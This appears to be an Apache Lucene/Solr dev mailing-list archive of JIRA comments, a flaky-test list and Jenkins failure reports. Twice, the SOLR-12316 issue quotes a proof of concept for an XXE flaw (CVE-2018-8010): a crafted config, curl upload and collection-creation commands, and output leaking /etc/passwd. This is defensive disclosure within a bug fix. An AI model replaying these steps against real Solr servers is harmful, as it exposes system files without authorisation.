https://issues.apache.org/jira/browse/LUCENE-8319?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16482649#comment-16482649
 ] 

Michael McCandless commented on LUCENE-8319:


{quote}I wonder if we could have TimeExceeededException extend 
CollectionTerminatedException 
{quote}
I think that's a good approach?  They both extend {{RuntimeException}} today.  
And then we could add a getter on {{TimeLimitingCollector}} to see if a timeout 
occurred.

> A Time-limiting collector that works with CollectorManagers
> ---
>
> Key: LUCENE-8319
> URL: https://issues.apache.org/jira/browse/LUCENE-8319
> Project: Lucene - Core
>  Issue Type: Improvement
>  Components: core/search
>Reporter: Tony Xu
>Priority: Minor
>
> Currently Lucene has *TimeLimitingCollector* to support time-bound collection 
> and it will throw 
> *TimeExceededException* if timeout happens. This only works nicely with the 
> single-thread low-level API from the IndexSearcher. The method signature is --
> *void search(List leaves, Weight weight, Collector 
> collector)*
> The intended use is to always enclose the searcher.search(query, collector) 
> call with a try ... catch and handle the timeout exception. Unfortunately 
> when working with a *CollectorManager* in the multi-thread search context, 
> the *TimeExceededException* thrown during collecting one leaf slice will be 
> re-thrown by *IndexSearcher* without calling *CollectorManager*'s reduce(), 
> even if other slices are successfully collected. The signature 
> of the search api with *CollectorManager* is --
> * T search(Query query, CollectorManager 
> collectorManager)*
>  
> The good news is that IndexSearcher handles *CollectionTerminatedException* 
> gracefully by ignoring it. We can either wrap TimeLimitingCollector and throw 
>  *CollectionTerminatedException* when timeout happens or simply replace 
> *TimeExceededException* with *CollectionTerminatedException*. In either way, 
> we also need to maintain a flag that indicates if timeout occurred so that 
> the user know it's a partial collection.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Commented] (SOLR-12316) CVE-2018-8010: Prevent XXE in solrconfig.xml and managed-schema(.xml)

2018-05-21 Thread Uwe Schindler (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-12316?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16482622#comment-16482622
 ] 

Uwe Schindler commented on SOLR-12316:
--

In addition, there are several ways to upload files, e.g. through the admin 
interface.

> CVE-2018-8010: Prevent XXE in solrconfig.xml and managed-schema(.xml)
> -
>
> Key: SOLR-12316
> URL: https://issues.apache.org/jira/browse/SOLR-12316
> Project: Solr
>  Issue Type: Bug
>  Security Level: Public(Default Security Level. Issues are Public) 
>  Components: config-api, Schema and Analysis, Server
>Affects Versions: 5.5.5, 6.6.3, 7.3
>Reporter: Ishan Chattopadhyaya
>Assignee: Uwe Schindler
>Priority: Blocker
>  Labels: security
> Fix For: 6.6.4, 7.4, master (8.0), 7.3.1
>
> Attachments: SOLR-12316-testfix.patch, SOLR-12316.patch, 
> SOLR-12316.patch, SOLR-12316.patch, SOLR-12316.patch, SOLR-12316.patch, 
> solr.log
>
>
> While trying to work around the issue of being unable to upload large files 
> to ZK (without jute.maxbuffer setting), [~antz] brought to my notice that he 
> was able to successfully achieve that using XXE. That alarmed me! Our 
> managed-schema and solrconfig.xml parse XXEs!
> Here's a very nasty attack I could execute using this and configset upload 
> functionality:
> Step 1: Create a configset with just two files in a directory called 
> "minimal":
> schema.xml:
> {code}
> 
>   
>   
> 
> {code}
> solrconfig.xml
> {code}
> 
>  
> ]>
> 
>   ${solr.data.dir:}
>
> class="${solr.directoryFactory:solr.NRTCachingDirectoryFactory}"/>
>   
>   7.3.0
>   
> 
>   ${solr.commitwithin.softcommit:true}
> 
>   
>   
> 
>   explicit
>   true
>   text
>   &passwdFile;
> 
>   
> 
> {code}
> Step 2: Upload the minimal directory to Solr using configset upload API:
> {code}
> [ishan@x260 solr] $ (cd minimal && zip -r - *) | curl -X POST --header 
> "Content-Type:application/octet-stream" --data-binary @- 
> "http://localhost:8983/solr/admin/configs?action=UPLOAD&name=mybadconfigset";
>   adding: schema.xml (deflated 42%)
>   adding: solrconfig.xml (deflated 50%)
> {
>   "responseHeader":{
> "status":0,
> "QTime":23}}
> {code}
> Step 3: Create a collection using this configset
> {code}
> [ishan@x260 solr] $ curl 
> "http://localhost:8983/solr/admin/collections?action=CREATE&name=mybadcoll&numShards=1&collection.configName=mybadconfigset";
> {
>   "responseHeader":{
> "status":0,
> "QTime":3431},
>   "success":{
> "192.168.1.6:8983_solr":{
>   "responseHeader":{
> "status":0,
> "QTime":2062},
>   "core":"mybadcoll_shard1_replica_n1"}}}
> {code}
> Step 4: Use Config API to check the select handler's config. The file is 
> revealed!
> {code}
> [ishan@x260 solr] $ curl 
> "http://localhost:8983/solr/mybadcoll/config/requestHandler";|jq
>   % Total% Received % Xferd  Average Speed   TimeTime Time  
> Current
>  Dload  Upload   Total   SpentLeft  Speed
> 100  7939  100  79390 0   7939  0  0:00:01 --:--:--  0:00:01  323k
> {
>   "responseHeader": {
> "status": 0,
> "QTime": 16
>   },
>   "config": {
> "requestHandler": {
>   "/select": {
> "name": "/select",
> "class": "solr.SearchHandler",
> "defaults": {
>   "echoParams": "explicit",
>   "indent": "true",
>   "df": "text",
>   "password": 
> "root:x:0:0:root:/root:/bin/bash\nbin:x:1:1:bin:/bin:/sbin/nologin\ndaemon:x:2:2:daemon:/sbin:/sbin/nologin\nadm:x:3:4:adm:/var/adm:/sbin/nologin\nlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin\nsync:x:5:0:sync:/sbin:/bin/sync\nshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown\nhalt:x:7:0:halt:/sbin:/sbin/halt\nmail:x:8:12:mail:/var/spool/mail:/sbin/nologin\noperator:x:11:0:operator:/root:/sbin/nologin\ngames:x:12:100:games:/usr/games:/sbin/nologin\nftp:x:14:50:FTP
>  
> User:/var/ftp:/sbin/nologin\nnobody:x:99:99:Nobody:/:/sbin/nologin\nsystemd-timesync:x:999:998:systemd
>  Time Synchronization:/:/sbin/nologin\nsystemd-network:x:192:192:systemd 
> Network Management:/:/sbin/nologin\nsystemd-resolve:x:193:193:systemd 
> Resolver:/:/sbin/nologin\ndbus:x:81:81:System message 
> bus:/:/sbin/nologin\npolkitd:x:998:997:User for 
> polkitd:/:/sbin/nologin\ngeoclue:x:997:996:User for 
> geoclue:/var/lib/geoclue:/sbin/nologin\nrtkit:x:172:172:RealtimeKit:/proc:/sbin/nologin\npulse:x:171:171:PulseAudio
>  System Daemon:/var/run/pulse:/sbin/nologin\navahi:x:70:70:Avahi mDNS/DNS-SD 
> Stack:/var/run/avahi-daemon:/sbin/nologin\nchrony:x:996:992::/var/lib/chrony:/sbin/nologin\nrpc:x:32:32:Rpcbind
>  Daemon:/var/lib/rpcbind:/sbin/nologin\nusbmuxd:x:113:113:usbmuxd 
>

[jira] [Commented] (SOLR-9480) Graph Traversal for Significantly Related Terms (Semantic Knowledge Graph)

2018-05-21 Thread ASF subversion and git services (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-9480?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16482620#comment-16482620
 ] 

ASF subversion and git services commented on SOLR-9480:
---

Commit 669b9e7a5343c625e265a075c9dbf24fcbff7363 in lucene-solr's branch 
refs/heads/master from Chris Hostetter
[ https://git-wip-us.apache.org/repos/asf?p=lucene-solr.git;h=669b9e7 ]

SOLR-9480: A new 'relatedness()' aggregate function for JSON Faceting to enable 
building Semantic Knowledge Graphs


> Graph Traversal for Significantly Related Terms (Semantic Knowledge Graph)
> --
>
> Key: SOLR-9480
> URL: https://issues.apache.org/jira/browse/SOLR-9480
> Project: Solr
>  Issue Type: Improvement
>  Security Level: Public(Default Security Level. Issues are Public) 
>Reporter: Trey Grainger
>Assignee: Hoss Man
>Priority: Major
> Attachments: SOLR-9480.patch, SOLR-9480.patch, SOLR-9480.patch, 
> SOLR-9480.patch, SOLR-9480.patch, SOLR-9480.patch
>
>
> This issue is to track the contribution of the Semantic Knowledge Graph Solr 
> Plugin (request handler), which exposes a graph-like interface for 
> discovering and traversing significant relationships between entities within 
> an inverted index.
> This data model has been described in the following research paper: [The 
> Semantic Knowledge Graph: A compact, auto-generated model for real-time 
> traversal and ranking of any relationship within a 
> domain|https://arxiv.org/abs/1609.00464], as well as in presentations I gave 
> in October 2015 at [Lucene/Solr 
> Revolution|http://www.slideshare.net/treygrainger/leveraging-lucenesolr-as-a-knowledge-graph-and-intent-engine]
>  and November 2015 at the [Bay Area Search 
> Meetup|http://www.treygrainger.com/posts/presentations/searching-on-intent-knowledge-graphs-personalization-and-contextual-disambiguation/].
> The source code for this project is currently available at 
> [https://github.com/careerbuilder/semantic-knowledge-graph], and the folks at 
> CareerBuilder (where this was built) have given me the go-ahead to now 
> contribute this back to the Apache Solr Project, as well.
> Check out the Github repository, research paper, or presentations for a more 
> detailed description of this contribution. Initial patch coming soon.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Commented] (SOLR-12316) CVE-2018-8010: Prevent XXE in solrconfig.xml and managed-schema(.xml)

2018-05-21 Thread Uwe Schindler (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-12316?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16482613#comment-16482613
 ] 

Uwe Schindler commented on SOLR-12316:
--

[~noble.paul]: This bug fixes the check in the Config file parser.

> CVE-2018-8010: Prevent XXE in solrconfig.xml and managed-schema(.xml)
> -
>
> Key: SOLR-12316
> URL: https://issues.apache.org/jira/browse/SOLR-12316
> Project: Solr
>  Issue Type: Bug
>  Security Level: Public(Default Security Level. Issues are Public) 
>  Components: config-api, Schema and Analysis, Server
>Affects Versions: 5.5.5, 6.6.3, 7.3
>Reporter: Ishan Chattopadhyaya
>Assignee: Uwe Schindler
>Priority: Blocker
>  Labels: security
> Fix For: 6.6.4, 7.4, master (8.0), 7.3.1
>
> Attachments: SOLR-12316-testfix.patch, SOLR-12316.patch, 
> SOLR-12316.patch, SOLR-12316.patch, SOLR-12316.patch, SOLR-12316.patch, 
> solr.log
>
>
> While trying to work around the issue of being unable to upload large files 
> to ZK (without jute.maxbuffer setting), [~antz] brought to my notice that he 
> was able to successfully achieve that using XXE. That alarmed me! Our 
> managed-schema and solrconfig.xml parse XXEs!
> Here's a very nasty attack I could execute using this and configset upload 
> functionality:
> Step 1: Create a configset with just two files in a directory called 
> "minimal":
> schema.xml:
> {code}
> 
>   
>   
> 
> {code}
> solrconfig.xml
> {code}
> 
>  
> ]>
> 
>   ${solr.data.dir:}
>
> class="${solr.directoryFactory:solr.NRTCachingDirectoryFactory}"/>
>   
>   7.3.0
>   
> 
>   ${solr.commitwithin.softcommit:true}
> 
>   
>   
> 
>   explicit
>   true
>   text
>   &passwdFile;
> 
>   
> 
> {code}
> Step 2: Upload the minimal directory to Solr using configset upload API:
> {code}
> [ishan@x260 solr] $ (cd minimal && zip -r - *) | curl -X POST --header 
> "Content-Type:application/octet-stream" --data-binary @- 
> "http://localhost:8983/solr/admin/configs?action=UPLOAD&name=mybadconfigset";
>   adding: schema.xml (deflated 42%)
>   adding: solrconfig.xml (deflated 50%)
> {
>   "responseHeader":{
> "status":0,
> "QTime":23}}
> {code}
> Step 3: Create a collection using this configset
> {code}
> [ishan@x260 solr] $ curl 
> "http://localhost:8983/solr/admin/collections?action=CREATE&name=mybadcoll&numShards=1&collection.configName=mybadconfigset";
> {
>   "responseHeader":{
> "status":0,
> "QTime":3431},
>   "success":{
> "192.168.1.6:8983_solr":{
>   "responseHeader":{
> "status":0,
> "QTime":2062},
>   "core":"mybadcoll_shard1_replica_n1"}}}
> {code}
> Step 4: Use Config API to check the select handler's config. The file is 
> revealed!
> {code}
> [ishan@x260 solr] $ curl 
> "http://localhost:8983/solr/mybadcoll/config/requestHandler";|jq
>   % Total% Received % Xferd  Average Speed   TimeTime Time  
> Current
>  Dload  Upload   Total   SpentLeft  Speed
> 100  7939  100  79390 0   7939  0  0:00:01 --:--:--  0:00:01  323k
> {
>   "responseHeader": {
> "status": 0,
> "QTime": 16
>   },
>   "config": {
> "requestHandler": {
>   "/select": {
> "name": "/select",
> "class": "solr.SearchHandler",
> "defaults": {
>   "echoParams": "explicit",
>   "indent": "true",
>   "df": "text",
>   "password": 
> "root:x:0:0:root:/root:/bin/bash\nbin:x:1:1:bin:/bin:/sbin/nologin\ndaemon:x:2:2:daemon:/sbin:/sbin/nologin\nadm:x:3:4:adm:/var/adm:/sbin/nologin\nlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin\nsync:x:5:0:sync:/sbin:/bin/sync\nshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown\nhalt:x:7:0:halt:/sbin:/sbin/halt\nmail:x:8:12:mail:/var/spool/mail:/sbin/nologin\noperator:x:11:0:operator:/root:/sbin/nologin\ngames:x:12:100:games:/usr/games:/sbin/nologin\nftp:x:14:50:FTP
>  
> User:/var/ftp:/sbin/nologin\nnobody:x:99:99:Nobody:/:/sbin/nologin\nsystemd-timesync:x:999:998:systemd
>  Time Synchronization:/:/sbin/nologin\nsystemd-network:x:192:192:systemd 
> Network Management:/:/sbin/nologin\nsystemd-resolve:x:193:193:systemd 
> Resolver:/:/sbin/nologin\ndbus:x:81:81:System message 
> bus:/:/sbin/nologin\npolkitd:x:998:997:User for 
> polkitd:/:/sbin/nologin\ngeoclue:x:997:996:User for 
> geoclue:/var/lib/geoclue:/sbin/nologin\nrtkit:x:172:172:RealtimeKit:/proc:/sbin/nologin\npulse:x:171:171:PulseAudio
>  System Daemon:/var/run/pulse:/sbin/nologin\navahi:x:70:70:Avahi mDNS/DNS-SD 
> Stack:/var/run/avahi-daemon:/sbin/nologin\nchrony:x:996:992::/var/lib/chrony:/sbin/nologin\nrpc:x:32:32:Rpcbind
>  Daemon:/var/lib/rpcbind:/sbin/nologin\nusbmuxd:x:113:113:usbmuxd 
> user:/:/sbin/nologin

[jira] [Commented] (LUCENE-8273) Add a ConditionalTokenFilter

2018-05-21 Thread ASF subversion and git services (JIRA)

[ 
https://issues.apache.org/jira/browse/LUCENE-8273?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16482583#comment-16482583
 ] 

ASF subversion and git services commented on LUCENE-8273:
-

Commit 0c0fce3e98c9a01c330329eca5153fb78c7decaf in lucene-solr's branch 
refs/heads/master from [~romseygeek]
[ https://git-wip-us.apache.org/repos/asf?p=lucene-solr.git;h=0c0fce3 ]

LUCENE-8273: TestRandomChains found some more end() handling problems


> Add a ConditionalTokenFilter
> 
>
> Key: LUCENE-8273
> URL: https://issues.apache.org/jira/browse/LUCENE-8273
> Project: Lucene - Core
>  Issue Type: New Feature
>Reporter: Alan Woodward
>Assignee: Alan Woodward
>Priority: Major
> Fix For: 7.4
>
> Attachments: LUCENE-8273-2.patch, LUCENE-8273-2.patch, 
> LUCENE-8273-part2-rebased.patch, LUCENE-8273-part2-rebased.patch, 
> LUCENE-8273-part2.patch, LUCENE-8273-part2.patch, LUCENE-8273.patch, 
> LUCENE-8273.patch, LUCENE-8273.patch, LUCENE-8273.patch, LUCENE-8273.patch, 
> LUCENE-8273.patch, LUCENE-8273.patch, LUCENE-8273.patch
>
>
> Spinoff of LUCENE-8265.  It would be useful to be able to wrap a TokenFilter 
> in such a way that it could optionally be bypassed based on the current state 
> of the TokenStream.  This could be used to, for example, only apply 
> WordDelimiterFilter to terms that contain hyphens.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Commented] (LUCENE-8273) Add a ConditionalTokenFilter

2018-05-21 Thread ASF subversion and git services (JIRA)

[ 
https://issues.apache.org/jira/browse/LUCENE-8273?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16482582#comment-16482582
 ] 

ASF subversion and git services commented on LUCENE-8273:
-

Commit a69321a4d05d30f06248d0a33a237d8978942a9f in lucene-solr's branch 
refs/heads/branch_7x from [~romseygeek]
[ https://git-wip-us.apache.org/repos/asf?p=lucene-solr.git;h=a69321a ]

LUCENE-8273: TestRandomChains found some more end() handling problems


> Add a ConditionalTokenFilter
> 
>
> Key: LUCENE-8273
> URL: https://issues.apache.org/jira/browse/LUCENE-8273
> Project: Lucene - Core
>  Issue Type: New Feature
>Reporter: Alan Woodward
>Assignee: Alan Woodward
>Priority: Major
> Fix For: 7.4
>
> Attachments: LUCENE-8273-2.patch, LUCENE-8273-2.patch, 
> LUCENE-8273-part2-rebased.patch, LUCENE-8273-part2-rebased.patch, 
> LUCENE-8273-part2.patch, LUCENE-8273-part2.patch, LUCENE-8273.patch, 
> LUCENE-8273.patch, LUCENE-8273.patch, LUCENE-8273.patch, LUCENE-8273.patch, 
> LUCENE-8273.patch, LUCENE-8273.patch, LUCENE-8273.patch
>
>
> Spinoff of LUCENE-8265.  It would be useful to be able to wrap a TokenFilter 
> in such a way that it could optionally be bypassed based on the current state 
> of the TokenStream.  This could be used to, for example, only apply 
> WordDelimiterFilter to terms that contain hyphens.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



BadApple candidates

2018-05-21 Thread Erick Erickson
I'm going to change how I collect the badapple candidates. After
getting a little
overwhelmed by the number of failure e-mails (even ignoring the ones with
BadApple enabled), "It come to me in a vision! In a flash!"" (points if you
know where that comes from, hint: Old music involving a pickle).

Since I collect failures for a week then run filter them by what's
also in Hoss's
results from two  weeks ago, that's really equivalent to creating the candidate
list from the intersection of the most recent week of Hoss's results and the
results from _three_ weeks ago. Much faster too. Thanks Hoss!

So that's what I'll do going forward.

Meanwhile, here's the list for this Thursday.

BadApple candidates: I'll BadApple these on Thursday unless there are objections
  org.apache.lucene.search.TestLRUQueryCache.testBulkScorerLocking
   org.apache.solr.TestDistributedSearch.test
   org.apache.solr.cloud.AddReplicaTest.test
   org.apache.solr.cloud.AssignBackwardCompatibilityTest.test
   org.apache.solr.cloud.CreateRoutedAliasTest.testCollectionNamesMustBeAbsent
   org.apache.solr.cloud.CreateRoutedAliasTest.testTimezoneAbsoluteDate
   org.apache.solr.cloud.CreateRoutedAliasTest.testV1
   org.apache.solr.cloud.CreateRoutedAliasTest.testV2
   
org.apache.solr.cloud.DeleteReplicaTest.raceConditionOnDeleteAndRegisterReplica
   org.apache.solr.cloud.LIRRollingUpdatesTest.testNewReplicaOldLeader
   org.apache.solr.cloud.LeaderVoteWaitTimeoutTest.basicTest
   
org.apache.solr.cloud.LeaderVoteWaitTimeoutTest.testMostInSyncReplicasCanWinElection
   org.apache.solr.cloud.MoveReplicaHDFSTest.testFailedMove
   org.apache.solr.cloud.RestartWhileUpdatingTest.test
   
org.apache.solr.cloud.TestCloudConsistency.testOutOfSyncReplicasCannotBecomeLeader
   org.apache.solr.cloud.TestPullReplica.testCreateDelete
   org.apache.solr.cloud.TestPullReplica.testKillLeader
   org.apache.solr.cloud.TestSolrCloudWithKerberosAlt.testBasics
   org.apache.solr.cloud.UnloadDistributedZkTest.test
   
org.apache.solr.cloud.api.collections.CollectionsAPIAsyncDistributedZkTest.testAsyncRequests
   
org.apache.solr.cloud.api.collections.CustomCollectionTest.testCustomCollectionsAPI
   org.apache.solr.cloud.autoscaling.ComputePlanActionTest.testNodeLost
   org.apache.solr.cloud.autoscaling.IndexSizeTriggerTest.testMergeIntegration
   org.apache.solr.cloud.autoscaling.IndexSizeTriggerTest.testSplitIntegration
   org.apache.solr.cloud.autoscaling.IndexSizeTriggerTest.testTrigger
   org.apache.solr.cloud.autoscaling.NodeAddedTriggerTest.testRestoreState
   
org.apache.solr.cloud.autoscaling.SearchRateTriggerIntegrationTest.testBelowSearchRate
   
org.apache.solr.cloud.autoscaling.SearchRateTriggerIntegrationTest.testDeleteNode
   org.apache.solr.cloud.autoscaling.SearchRateTriggerTest.testTrigger
   org.apache.solr.cloud.hdfs.HdfsUnloadDistributedZkTest.test
   org.apache.solr.cloud.hdfs.StressHdfsTest.test
   org.apache.solr.handler.TestSQLHandler.doTest
   org.apache.solr.security.BasicAuthIntegrationTest.testBasicAuth
   org.apache.solr.uninverting.TestDocTermOrds.testTriggerUnInvertLimit
   org.apache.solr.update.TestHdfsUpdateLog.testFSThreadSafety
   org.apache.solr.update.TestInPlaceUpdatesDistrib.test


Number of AwaitsFix: 21 Number of BadApples: 99

*AwaitsFix Annotations:


Lucene AwaitsFix
GeoPolygonTest.java
   testLUCENE8276_case3()
   //@AwaitsFix(bugUrl="https://issues.apache.org/jira/browse/LUCENE-8276";)

GeoPolygonTest.java
   testLUCENE8280()
   //@AwaitsFix(bugUrl="https://issues.apache.org/jira/browse/LUCENE-8280";)

GeoPolygonTest.java
   testLUCENE8281()
   //@AwaitsFix(bugUrl="https://issues.apache.org/jira/browse/LUCENE-8281";)

RandomGeoPolygonTest.java
   testCompareBigPolygons()
   //@AwaitsFix(bugUrl="https://issues.apache.org/jira/browse/LUCENE-8281";)

RandomGeoPolygonTest.java
   testCompareSmallPolygons()
   //@AwaitsFix(bugUrl="https://issues.apache.org/jira/browse/LUCENE-8281";)

TestControlledRealTimeReopenThread.java
   testCRTReopen()
   @AwaitsFix(bugUrl = "https://issues.apache.org/jira/browse/LUCENE-5737";)

TestICUNormalizer2CharFilter.java
   testRandomStrings()
   @AwaitsFix(bugUrl = "https://issues.apache.org/jira/browse/LUCENE-5595";)

TestICUTokenizerCJK.java
   TestICUTokenizerCJK suite
   @AwaitsFix(bugUrl="https://issues.apache.org/jira/browse/LUCENE-8222";)

TestMoreLikeThis.java
   testMultiFieldShouldReturnPerFieldBooleanQuery()
   @AwaitsFix(bugUrl = "https://issues.apache.org/jira/browse/LUCENE-7161";)

UIMABaseAnalyzerTest.java
   testRandomStrings()
   @Test @AwaitsFix(bugUrl =
"https://issues.apache.org/jira/browse/LUCENE-3869";)

UIMABaseAnalyzerTest.java
   testRandomStringsWithConfigurationParameters()
   @Test @AwaitsFix(bugUrl =
"https://issues.apache.org/jira/browse/LUCENE-3869";)

UIMATypeAwareAnalyzerTest.java
   testRandomStrings()
   @Test @AwaitsFix(bugUrl =
"https://issues.apache.org/jira/browse/LUCENE-3869";)


Solr AwaitsFix
ReplaceNodeNoTarget

[jira] [Commented] (SOLR-12377) Overseer leak failure in TestLeaderElectionZkExpiry

2018-05-21 Thread Mark Miller (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-12377?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16482563#comment-16482563
 ] 

Mark Miller commented on SOLR-12377:


Looks okay to me.

> Overseer leak failure in TestLeaderElectionZkExpiry 
> 
>
> Key: SOLR-12377
> URL: https://issues.apache.org/jira/browse/SOLR-12377
> Project: Solr
>  Issue Type: Bug
>  Security Level: Public(Default Security Level. Issues are Public) 
>  Components: SolrCloud
>Reporter: Mikhail Khludnev
>Assignee: Mikhail Khludnev
>Priority: Major
> Attachments: SOLR-12377.patch, SOLR-12377.patch, 
> TestLeaderElectionZkExpiry-Overseer-leak.log
>
>
> After the SOLR-12200 is done, I checked {{TestLeaderElectionZkExpiry}} which 
> is bad apple now. it yields the same Overseer leakage failure. Attaching a 
> simple fix after which it beasts fine.
> {code}
> $ ant beast -Dbeast.iters=100 -Dtestcase=TestLeaderElectionZkExpiry 
> -Dtests.dups=3
> ...
>   [beaster] Beast round: 100
>   ..
>   [beaster] Beasting finished.
> -check-totals:
> beast:
> BUILD SUCCESSFUL
> {code} 



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[JENKINS] Lucene-Solr-Tests-master - Build # 2539 - Still Unstable

2018-05-21 Thread Apache Jenkins Server
Build: https://builds.apache.org/job/Lucene-Solr-Tests-master/2539/

3 tests failed.
FAILED:  org.apache.solr.cloud.autoscaling.NodeAddedTriggerTest.testRestoreState

Error Message:
Did not expect the processor to fire on first run! event={   
"id":"607d3cc2c6345dT7jtpv4rq0cqe2on812a27fpae",   
"source":"node_added_trigger",   "eventTime":27159297683502173,   
"eventType":"NODEADDED",   "properties":{ "eventTimes":[27159297683502173], 
"nodeNames":["127.0.0.1:39659_solr"]}}

Stack Trace:
java.lang.AssertionError: Did not expect the processor to fire on first run! 
event={
  "id":"607d3cc2c6345dT7jtpv4rq0cqe2on812a27fpae",
  "source":"node_added_trigger",
  "eventTime":27159297683502173,
  "eventType":"NODEADDED",
  "properties":{
"eventTimes":[27159297683502173],
"nodeNames":["127.0.0.1:39659_solr"]}}
at 
__randomizedtesting.SeedInfo.seed([860FB951B6B7BD4C:48A11DC24E8EC55A]:0)
at org.junit.Assert.fail(Assert.java:93)
at 
org.apache.solr.cloud.autoscaling.NodeAddedTriggerTest.lambda$new$0(NodeAddedTriggerTest.java:49)
at 
org.apache.solr.cloud.autoscaling.NodeAddedTrigger.run(NodeAddedTrigger.java:161)
at 
org.apache.solr.cloud.autoscaling.NodeAddedTriggerTest.testRestoreState(NodeAddedTriggerTest.java:257)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at 
sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at 
sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner.invoke(RandomizedRunner.java:1737)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$8.evaluate(RandomizedRunner.java:934)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$9.evaluate(RandomizedRunner.java:970)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$10.evaluate(RandomizedRunner.java:984)
at 
com.carrotsearch.randomizedtesting.rules.SystemPropertiesRestoreRule$1.evaluate(SystemPropertiesRestoreRule.java:57)
at 
org.apache.lucene.util.TestRuleSetupTeardownChained$1.evaluate(TestRuleSetupTeardownChained.java:49)
at 
org.apache.lucene.util.AbstractBeforeAfterRule$1.evaluate(AbstractBeforeAfterRule.java:45)
at 
org.apache.lucene.util.TestRuleThreadAndTestName$1.evaluate(TestRuleThreadAndTestName.java:48)
at 
org.apache.lucene.util.TestRuleIgnoreAfterMaxFailures$1.evaluate(TestRuleIgnoreAfterMaxFailures.java:64)
at 
org.apache.lucene.util.TestRuleMarkFailure$1.evaluate(TestRuleMarkFailure.java:47)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl$StatementRunner.run(ThreadLeakControl.java:368)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl.forkTimeoutingTask(ThreadLeakControl.java:817)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl$3.evaluate(ThreadLeakControl.java:468)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner.runSingleTest(RandomizedRunner.java:943)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$5.evaluate(RandomizedRunner.java:829)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$6.evaluate(RandomizedRunner.java:879)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$7.evaluate(RandomizedRunner.java:890)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.rules.SystemPropertiesRestoreRule$1.evaluate(SystemPropertiesRestoreRule.java:57)
at 
org.apache.lucene.util.AbstractBeforeAfterRule$1.evaluate(AbstractBeforeAfterRule.java:45)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
org.apache.lucene.util.TestRuleStoreClassName$1.evaluate(TestRuleStoreClassName.java:41)
at 
com.carrotsearch.randomizedtesting.rules.NoShadowingOrOverridesOnMethodsRule$1.evaluate(NoShadowingOrOverridesOnMethodsRule.java:40)
at 
com.carrotsearch.randomizedtesting.rules.NoShadowingOrOverridesOnMethodsRule$1.evaluate(NoShadowingOrOverridesOnMethodsRule.java:40)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
org.apache.lucene.util.TestRuleAssertionsRequired$1.evaluate(TestRuleAssertionsRequired.java:53)
at 
org.apache.lucene.util.TestRuleMarkFailure$1.evaluate(TestRuleMarkFailure.java:47)
at 
org.apache.lucene.util.TestRuleIgnoreAfterMaxFailures$1.evaluate(TestRuleIgnoreAfterMaxFailures.java:64)
at 
or

[JENKINS] Lucene-Solr-7.x-MacOSX (64bit/jdk1.8.0) - Build # 658 - Unstable!

2018-05-21 Thread Policeman Jenkins Server
Build: https://jenkins.thetaphi.de/job/Lucene-Solr-7.x-MacOSX/658/
Java: 64bit/jdk1.8.0 -XX:+UseCompressedOops -XX:+UseG1GC

5 tests failed.
FAILED:  
org.apache.solr.cloud.autoscaling.IndexSizeTriggerTest.testSplitIntegration

Error Message:
last state: 
DocCollection(testSplitIntegration_collection//clusterstate.json/39)={   
"replicationFactor":"2",   "pullReplicas":"0",   
"router":{"name":"compositeId"},   "maxShardsPerNode":"2",   
"autoAddReplicas":"false",   "nrtReplicas":"2",   "tlogReplicas":"0",   
"autoCreated":"true",   "shards":{ "shard2":{   "replicas":{ 
"core_node3":{   
